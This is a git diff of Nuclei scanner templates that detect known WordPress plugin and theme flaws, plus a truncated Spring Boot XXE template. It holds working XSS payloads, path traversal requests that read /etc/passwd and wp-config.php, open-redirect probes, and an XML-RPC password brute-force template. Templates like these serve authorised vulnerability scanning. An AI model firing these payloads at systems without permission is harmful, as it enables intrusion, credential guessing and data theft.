@@ id: wordpress-wordfence-xss - info: - name: WordPress Wordfence 7.4.6 - Cross0Site Scripting + name: WordPress Wordfence 7.4.6 Cross Site Scripting author: madrobot severity: medium - description: WordPress Wordfence 7.4.6 is vulnerable to cross-site scripting. - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 - cwe-id: CWE-80 - metadata: - max-request: 1 tags: wordpress,wp-plugin,xss,wordfence - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wordfence/lib/diffResult.php?file=%27%3E%22%3Csvg%2Fonload=confirm%28%27test%27%29%3E" - matchers-condition: and matchers: - type: word words: - "'>\"<svg/onload=confirm('test')>" part: body - - type: word words: - "text/html" part: header - - type: status status: - 200 - -# digest: 4b0a00483046022100815f67bcdfe2984d98c0813beb5910e2cc89f870bb3bbd77541709c3b946b81d022100a2dbf03c4062d763655eb094266a2faa921751d5b6a85ddc160e4731ee1731a0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml index a36ec88196..bd81293cdb 100644 --- a/poc/wordpress/wordpress-zebra-form-xss-11379.yaml +++ b/poc/wordpress/wordpress-zebra-form-xss-11379.yaml @@ -1,27 +1,22 @@ id: wordpress-zebra-form-xss info: - name: Wordpress Zebra Form XSS + name: Wordpress Zebra Form - Cross-Site Scripting author: madrobot severity: medium - reference: https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html + reference: + - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html tags: wordpress,xss requests: - raw: - | POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-GB,en;q=0.5 - Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074 - Content-Length: 241 Origin: null - Connection: close - Upgrade-Insecure-Requests: 1 -----------------------------77916619616724262872902741074 - Content-Disposition: form-data; name="upload"; filename="a.txt" + Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt" Content-Type: text/plain Test -----------------------------77916619616724262872902741074-- diff --git a/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml b/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml index dc8fd403a8..877c27c3f1 100644 --- a/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml +++ b/poc/wordpress/wp-123contactform-plugin-listing-11400.yaml @@ -1,24 +1,28 @@ -id: wp-123contactform-plugin-listing -info: - name: WordPress 123ContactForm Plugin Directory Listing - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: | - - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/123contactform-for-wordpress" - condition: and - - type: status - status: - - 200 +id: wp-123contactform-plugin-listing + +info: + name: WordPress 123ContactForm Plugin Directory Listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: | + - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html + - https://www.exploit-db.com/ghdb/6979 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" + + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/123contactform-for-wordpress" + condition: and + + - type: status + status: + - 200 diff --git a/poc/wordpress/wp-adaptive-xss.yaml b/poc/wordpress/wp-adaptive-xss.yaml index f297df178f..0a6168d053 100644 --- a/poc/wordpress/wp-adaptive-xss.yaml +++ b/poc/wordpress/wp-adaptive-xss.yaml @@ -1,4 +1,5 @@ id: wp-adaptive-xss + info: name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting author: dhiyaneshDK @@ -8,10 +9,12 @@ info: - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 - https://plugins.trac.wordpress.org/changeset/2655683 tags: wordpress,xss,wp-plugin,wp + requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true" + matchers-condition: and matchers: - type: word @@ -19,10 +22,12 @@ requests: - '<img/src/onerror=alert(document.domain)>' - '<td>Image</td>' condition: and + - type: word part: header words: - 'text/html' + - type: status status: - 200 diff --git a/poc/wordpress/wp-arforms-listing.yaml b/poc/wordpress/wp-arforms-listing.yaml index e223f9ef7d..505669bffc 100644 --- a/poc/wordpress/wp-arforms-listing.yaml +++ b/poc/wordpress/wp-arforms-listing.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6424 + reference: https://www.exploit-db.com/ghdb/6424 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-church-admin-xss-11424.yaml b/poc/wordpress/wp-church-admin-xss-11424.yaml index 089b607075..6dfb09ebcb 100644 --- a/poc/wordpress/wp-church-admin-xss-11424.yaml +++ b/poc/wordpress/wp-church-admin-xss-11424.yaml @@ -1,29 +1,25 @@ id: wp-church-admin-xss - info: name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + reference: + - https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html tags: wordpress,xss,wp-plugin - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-code-snippets-xss.yaml b/poc/wordpress/wp-code-snippets-xss.yaml index d6d4c61340..b3552bcadb 100644 --- a/poc/wordpress/wp-code-snippets-xss.yaml +++ b/poc/wordpress/wp-code-snippets-xss.yaml @@ -1,11 +1,10 @@ id: wp-code-snippets-xss info: - name: Code Snippets Wordpress Plugin - Cross-Site Scripting + name: Code Snippets Wordpress Plugin - XSS author: dhiyaneshDK severity: medium description: A reflected Cross-Site Scripting (XSS) vulnerability has been found in the Code Snippets WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any logged-in admin who views the link - reference: - - https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ + reference: https://www.securify.nl/en/advisory/cross-site-scripting-in-code-snippets-wordpress-plugin/ tags: wordpress,xss,wp-plugin,authenticated requests: - raw: @@ -27,9 +26,6 @@ requests: part: body words: - '</script><script>alert(document.domain)</script>' - - 'toplevel_page_snippets' - - 'Search results in tag' - condition: and - type: word part: header words: diff --git a/poc/wordpress/wp-flagem-xss.yaml b/poc/wordpress/wp-flagem-xss.yaml index 98183da5f2..bc74462f47 100644 --- a/poc/wordpress/wp-flagem-xss.yaml +++ b/poc/wordpress/wp-flagem-xss.yaml @@ -1,30 +1,24 @@ id: wp-flagem-xss - info: name: WordPress Plugin FlagEm - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - https://www.exploit-db.com/exploits/38674 + reference: https://www.exploit-db.com/exploits/38674 tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-grimag-open-redirect-11458.yaml b/poc/wordpress/wp-grimag-open-redirect-11458.yaml index 40803f329c..20ac245e37 100644 --- a/poc/wordpress/wp-grimag-open-redirect-11458.yaml +++ b/poc/wordpress/wp-grimag-open-redirect-11458.yaml @@ -1,18 +1,30 @@ id: wp-grimag-open-redirect + info: - name: WordPress Grimag Themes < 1.1.1 Open Redirection + name: WordPress Grimag <1.1.1 - Open Redirection author: 0x_Akoko - severity: low - description: The Grimag WordPress theme was affected by an Open Redirection security vulnerability. + severity: medium + description: WordPress Grimag theme before 1.1.1 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: Fixed in 1.1.1. reference: - https://wpscan.com/vulnerability/db319d4c-7de6-4d36-90e9-86de82e9c03a - tags: wordpress,wp-theme,redirect -requests: + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cwe-id: CWE-601 + metadata: + max-request: 1 + tags: wp-theme,redirect,wpscan,wordpress + +http: - method: GET path: - "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header + +# digest: 4a0a00473045022100d40ec63c134265020e2c32431122360fc45c7638ad3697c5ce3f42982b1cd01b02207e07120720fc907481b2c0530ce58a1079e47bc99d77fb5c35a578ccc5bce04b:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wp-gtranslate-open-redirect.yaml b/poc/wordpress/wp-gtranslate-open-redirect.yaml index 3db87c4aa6..2d9331f914 100644 --- a/poc/wordpress/wp-gtranslate-open-redirect.yaml +++ b/poc/wordpress/wp-gtranslate-open-redirect.yaml @@ -4,8 +4,9 @@ info: author: dhiyaneshDK severity: medium description: The Translate WordPress with GTranslate WordPress plugin was affected by an Unauthenticated Open Redirect security vulnerability. + reference: + - https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ tags: redirect,wordpress - reference: https://www.pluginvulnerabilities.com/2017/02/17/open-redirect-vulnerability-in-gtranslate/ requests: - method: GET path: diff --git a/poc/wordpress/wp-haberadam-idor-11468.yaml b/poc/wordpress/wp-haberadam-idor-11468.yaml index c8001614ba..c933e6ab2a 100644 --- a/poc/wordpress/wp-haberadam-idor-11468.yaml +++ b/poc/wordpress/wp-haberadam-idor-11468.yaml @@ -1,21 +1,17 @@ id: wp-haberadam-idor - info: - name: WordPress Themes Haberadam JSON API - IDOR and Path Disclosure + name: WordPress Themes Haberadam IDOR and Full Path Disclosure via JSON API author: pussycat0x severity: low - reference: - - https://cxsecurity.com/issue/WLB-2021090078 + reference: https://cxsecurity.com/issue/WLB-2021090078 metadata: google-dork: inurl:/wp-content/themes/haberadam/ tags: wordpress,idor,wp-theme,disclosure - requests: - method: GET path: - '{{BaseURL}}/wp-content/themes/haberadam/api/mobile-info.php?id=' - '{{BaseURL}}/blog/wp-content/themes/haberadam/api/mobile-info.php?id=' - stop-at-first-match: true matchers-condition: and matchers: @@ -27,11 +23,9 @@ requests: - '"degree"' - '"icon"' condition: and - - type: status status: - 200 - - type: word part: header words: diff --git a/poc/wordpress/wp-idx-broker-platinum-listing.yaml b/poc/wordpress/wp-idx-broker-platinum-listing.yaml index bee377c8d3..6e2ffaab6c 100644 --- a/poc/wordpress/wp-idx-broker-platinum-listing.yaml +++ b/poc/wordpress/wp-idx-broker-platinum-listing.yaml @@ -4,7 +4,8 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6416 + reference: + - https://www.exploit-db.com/ghdb/6416 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-javospot-lfi-11480.yaml b/poc/wordpress/wp-javospot-lfi-11480.yaml index 6786157651..747c17bdeb 100644 --- a/poc/wordpress/wp-javospot-lfi-11480.yaml +++ b/poc/wordpress/wp-javospot-lfi-11480.yaml @@ -1,4 +1,5 @@ id: wp-javospot-lfi + info: name: Javo Spot Premium Theme - Unauthenticated Directory Traversal author: 0x_Akoko @@ -9,10 +10,12 @@ info: - https://wpscan.com/vulnerability/2d465fc4-d4fa-43bb-9c0d-71dcc3ee4eab - https://themeforest.net/item/javo-spot-multi-purpose-directory-wordpress-theme/13198068 tags: wordpress,wp-theme,lfi,wp + requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery' + matchers-condition: and matchers: - type: word @@ -21,6 +24,7 @@ requests: - "DB_NAME" - "DB_PASSWORD" condition: and + - type: status status: - 200 diff --git a/poc/wordpress/wp-license-file-11489.yaml b/poc/wordpress/wp-license-file-11489.yaml index 57edfbbd1d..5948f09b55 100644 --- a/poc/wordpress/wp-license-file-11489.yaml +++ b/poc/wordpress/wp-license-file-11489.yaml @@ -1,22 +1,18 @@ id: wp-license-file - info: name: WordPress license file disclosure author: yashgoti severity: info tags: wordpress - requests: - method: GET path: - "{{BaseURL}}/license.txt" - matchers-condition: and matchers: - type: word words: - "WordPress - Web publishing software" - - type: status status: - 200 diff --git a/poc/wordpress/wp-license-file.yaml b/poc/wordpress/wp-license-file.yaml index 5948f09b55..f2ee4bbc05 100644 --- a/poc/wordpress/wp-license-file.yaml +++ b/poc/wordpress/wp-license-file.yaml @@ -1,18 +1,21 @@ id: wp-license-file + info: name: WordPress license file disclosure author: yashgoti severity: info - tags: wordpress + requests: - method: GET path: - "{{BaseURL}}/license.txt" + matchers-condition: and matchers: - type: word words: - "WordPress - Web publishing software" + - type: status status: - 200 diff --git a/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml b/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml index 1869a7386f..42ab9af2c0 100644 --- a/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml +++ b/poc/wordpress/wp-mailchimp-log-exposure-11492.yaml @@ -1,28 +1,23 @@ id: wp-mailchimp-log-exposure - info: name: WordPress Mailchimp 4 Debug Log Exposure author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure - + tags: logs,wordpress,exposure,mailchimp requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "WARNING: Form" - - type: word words: - 'text/plain' - part: header \ No newline at end of file + part: header diff --git a/poc/wordpress/wp-mstore-plugin-listing.yaml b/poc/wordpress/wp-mstore-plugin-listing.yaml index 62099df1e8..b978fbaad6 100644 --- a/poc/wordpress/wp-mstore-plugin-listing.yaml +++ b/poc/wordpress/wp-mstore-plugin-listing.yaml @@ -1,5 +1,4 @@ id: wp-mstore-plugin-listing - info: name: Wordpress Plugin MStore API author: pussycat0x @@ -8,12 +7,10 @@ info: metadata: google-dork: inurl:/wp-content/plugins/mstore-api/ tags: wordpress,listing,wp-plugin - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/mstore-api/" - matchers-condition: and matchers: - type: word @@ -21,7 +18,6 @@ requests: - "Index of" - "/wp-content/plugins/mstore-api" condition: and - - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/wordpress/wp-nextgen-xss.yaml b/poc/wordpress/wp-nextgen-xss.yaml index 26930307d2..b8c4c9254f 100644 --- a/poc/wordpress/wp-nextgen-xss.yaml +++ b/poc/wordpress/wp-nextgen-xss.yaml @@ -1,30 +1,24 @@ id: wp-nextgen-xss - info: name: WordPress Plugin NextGEN Gallery 1.9.10 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - reference: - - http://web.archive.org/web/20210123110617/https://www.securityfocus.com/bid/57200/info + reference: https://www.securityfocus.com/bid/57200/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-phpfreechat-xss.yaml b/poc/wordpress/wp-phpfreechat-xss.yaml index f2e72f6d70..ef3aa1dea3 100644 --- a/poc/wordpress/wp-phpfreechat-xss.yaml +++ b/poc/wordpress/wp-phpfreechat-xss.yaml @@ -1,5 +1,4 @@ id: wp-phpfreechat-xss - info: name: WordPress Plugin PHPFreeChat - 'url' Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,24 +6,20 @@ info: reference: - http://web.archive.org/web/20210120061848/https://www.securityfocus.com/bid/54332/info tags: wordpress,xss,wp-plugin - requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and matchers: - type: word words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-plugin-lifterlms-11533.yaml b/poc/wordpress/wp-plugin-lifterlms-11533.yaml index 5e7586d2cc..d5ea2cb71b 100644 --- a/poc/wordpress/wp-plugin-lifterlms-11533.yaml +++ b/poc/wordpress/wp-plugin-lifterlms-11533.yaml @@ -1,22 +1,25 @@ -id: wordpress-plugins-lifterlms -info: - name: WordPress Plugin lifterlms Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6420 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/lifterlms/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/lifterlms/" - condition: and - - type: status - status: - - 200 +id: wordpress-plugins-lifterlms + +info: + name: WordPress Plugin lifterlms Listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6420 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/lifterlms/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/wp-content/plugins/lifterlms/" + condition: and + + - type: status + status: + - 200 \ No newline at end of file diff --git a/poc/wordpress/wp-plugin-utlimate-member.yaml b/poc/wordpress/wp-plugin-utlimate-member.yaml index 69ff7ca70b..f659152483 100644 --- a/poc/wordpress/wp-plugin-utlimate-member.yaml +++ b/poc/wordpress/wp-plugin-utlimate-member.yaml @@ -4,7 +4,8 @@ info: author: pussycat0x severity: info description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6998 + reference: + - https://www.exploit-db.com/ghdb/6998 tags: wordpress,listing,plugin requests: - method: GET diff --git a/poc/wordpress/wp-prostore-open-redirect.yaml b/poc/wordpress/wp-prostore-open-redirect.yaml index 5d31d50aae..820d21e476 100644 --- a/poc/wordpress/wp-prostore-open-redirect.yaml +++ b/poc/wordpress/wp-prostore-open-redirect.yaml @@ -1,17 +1,21 @@ id: wp-prostore-open-redirect + info: name: WordPress ProStore Themes 1.1.2 Open Redirection author: 0x_Akoko - description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. - reference: https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc severity: low + description: The prostore WordPress theme was affected by an Open Redirection security vulnerability. + reference: + - https://wpscan.com/vulnerability/2e0f8b7f-96eb-443c-a553-550e42ec67dc tags: wordpress,wp-theme,redirect + requests: - method: GET path: - "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/" + matchers: - type: regex regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header + part: header \ No newline at end of file diff --git a/poc/wordpress/wp-slideshow-xss.yaml b/poc/wordpress/wp-slideshow-xss.yaml index 49be6efa96..2b851c9f5b 100644 --- a/poc/wordpress/wp-slideshow-xss.yaml +++ b/poc/wordpress/wp-slideshow-xss.yaml @@ -1,5 +1,4 @@ id: wp-slideshow-xss - info: name: WordPress Plugin Slideshow - Reflected Cross-Site Scripting (XSS) author: daffainfo @@ -7,7 +6,6 @@ info: reference: - https://www.exploit-db.com/exploits/37948 tags: wordpress,xss,wp-plugin - requests: - method: GET path: @@ -22,12 +20,10 @@ requests: words: - "</script><script>alert(document.domain)</script>" part: body - - type: word part: header words: - text/html - - type: status status: - 200 diff --git a/poc/wordpress/wp-socialfit-xss-11582.yaml b/poc/wordpress/wp-socialfit-xss-11582.yaml index 56b6690c8f..61f70d16de 100644 --- a/poc/wordpress/wp-socialfit-xss-11582.yaml +++ b/poc/wordpress/wp-socialfit-xss-11582.yaml @@ -1,15 +1,13 @@ id: wp-socialfit-xss - info: name: WordPress Plugin SocialFit - 'msg' Cross-Site Scripting author: daffainfo severity: medium description: | SocialFit plugin for WordPress is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. - reference: + reference: | - https://www.exploit-db.com/exploits/37481 tags: wordpress,xss,wp-plugin - requests: - method: GET path: diff --git a/poc/wordpress/wp-tutor-lfi-11599.yaml b/poc/wordpress/wp-tutor-lfi-11599.yaml index 4362f3d8af..010102368f 100644 --- a/poc/wordpress/wp-tutor-lfi-11599.yaml +++ b/poc/wordpress/wp-tutor-lfi-11599.yaml @@ -1,27 +1,17 @@ id: wp-tutor-lfi - info: - name: WordPress tutor 1.5.3 - Local File Inclusion + name: WordPress Plugin tutor.1.5.3 - Local File Inclusion author: 0x240x23elu severity: high - description: WordPress tutor.1.5.3 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/48058 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cwe-id: CWE-22 tags: wordpress,wp-plugin,lfi - requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - matchers: - type: regex regex: - "root:.*:0:0:" part: body - -# Enhanced by mp on 2022/07/29 diff --git a/poc/wordpress/wp-vault-lfi(1).yaml b/poc/wordpress/wp-vault-lfi(1).yaml old mode 100644 new mode 100755 index 0bb54330d9..8869a324ad --- a/poc/wordpress/wp-vault-lfi(1).yaml +++ b/poc/wordpress/wp-vault-lfi(1).yaml @@ -1,24 +1,33 @@ id: wp-vault-local-file-inclusion - info: - name: WP Vault 0.8.6.6 – Local File Inclusion - author: 0x_Akoko - severity: high - reference: https://www.exploit-db.com/exploits/40850 - tags: wp-plugin,wordpress,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd" + name: WP Vault 0.8.6.6 Local File Inclusion + author: + - l0ne1y + description: |- + WordPress Plugin Vault 存在路径遍历问题导致文件包含漏洞 + WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 - matchers-condition: and - matchers: + WordPress Plugin Vault 0.8.6.6存在路径遍历漏洞,该漏洞允许远程攻击者通过wpv-image参数读取系统中的任意文件。 + severity: critical + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序:https://wordpress.org/plugins/ - - type: regex - regex: - - "root:.*:0:0" - - - type: status - status: - - 200 + 临时修复方案: + 1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断 + 2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过 + 3、禁止服务器远程文件包含 + 4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。 + 5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd' + method: GET diff --git a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml index cb27f780b4..26b60896bf 100644 --- a/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml +++ b/poc/wordpress/wp-xmlrpc-brute-force-11623.yaml @@ -1,5 +1,4 @@ id: wordpress-xmlrpc-brute-force - info: name: Wordpress XMLRPC.php username and password Bruteforcer author: Exid @@ -9,7 +8,6 @@ info: - https://bugdasht.ir/reports/3c6841c0-ae4c-11eb-a510-517171a9198c - https://www.acunetix.com/vulnerabilities/web/wordpress-xml-rpc-authentication-brute-force/ tags: wordpress,php,xmlrpc,fuzz - requests: - raw: - | @@ -29,18 +27,15 @@ requests: </param> </params> </methodCall> - attack: clusterbomb payloads: username: helpers/wordlists/wp-users.txt password: helpers/wordlists/wp-passwords.txt - matchers-condition: and matchers: - type: status status: - 200 - - type: word part: body words: diff --git a/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml b/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml index d1f2247e27..e9faa5f0c8 100644 --- a/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml +++ b/poc/wordpress/wp-xmlrpc-pingback-detection-11627.yaml @@ -3,10 +3,10 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 + tags: wordpress,ssrf,oast,xmlrpc requests: - raw: - | diff --git a/poc/wordpress/wp-xmlrpc.yaml b/poc/wordpress/wp-xmlrpc.yaml index c72351ab3a..850ea25a51 100644 --- a/poc/wordpress/wp-xmlrpc.yaml +++ b/poc/wordpress/wp-xmlrpc.yaml @@ -1,11 +1,9 @@ -id: wordpress-xmlrpc-file-1 - +id: wordpress-xmlrpc-file info: name: WordPress xmlrpc author: udit_thakkur severity: info tags: wordpress - requests: - method: GET path: diff --git a/poc/wordpress/wpdm-cache-session-11439.yaml b/poc/wordpress/wpdm-cache-session-11439.yaml index ba8153e31e..a3ca8cc8f8 100644 --- a/poc/wordpress/wpdm-cache-session-11439.yaml +++ b/poc/wordpress/wpdm-cache-session-11439.yaml @@ -1,10 +1,12 @@ id: wpdm-cache-session + info: name: Wpdm-Cache Session author: dhiyaneshDk severity: medium reference: https://www.exploit-db.com/ghdb/7004 tags: wordpress + requests: - method: GET path: @@ -17,6 +19,7 @@ requests: - ".txt" - "wpdm-cache" condition: and + part: body - type: status status: diff --git a/poc/wordpress/wptouch-open-redirect-11594.yaml b/poc/wordpress/wptouch-open-redirect-11594.yaml index d999043d40..576e334c9e 100644 --- a/poc/wordpress/wptouch-open-redirect-11594.yaml +++ b/poc/wordpress/wptouch-open-redirect-11594.yaml @@ -1,5 +1,4 @@ id: wptouch-open-redirect - info: name: WPTouch Switch Desktop 3.x Open Redirection author: 0x_Akoko @@ -12,16 +11,15 @@ info: Open redirect is a failure in that process that makes it possible for attackers to steer users to malicious websites. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. Web users often encounter redirection when they visit the Web site of a company whose name has been changed or which has been acquired by another company. Visiting unreal web page user's computer becomes affected by malware the task of which is to deceive the valid actor and steal his personal data. The WPtouch plugin for WordPress is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. - reference: https://cxsecurity.com/issue/WLB-2020030114 + reference: + - https://cxsecurity.com/issue/WLB-2020030114 tags: wp-plugin,redirect,wordpress - requests: - method: GET path: - - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/" - + - "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://interact.sh/" matchers: - type: regex regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' part: header diff --git a/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml b/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml index 31723c324d..8d86dd794f 100644 --- a/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml +++ b/poc/xml_external_entity/springboot-actuators-jolokia-xxe.yaml @@ -2,27 +2,30 @@ id: springboot-actuators-jolokia-xxe info: name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 + author: dwisiswant0,ipanda severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to perform an XML External Entities (XXE) attack and include content stored on a remote server as if it was its own. This has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + - https://github.com/mpgn/Spring-Boot-Actuator-Exploit + tags: springboot,jolokia,xxe requests: - method: GET path: - - 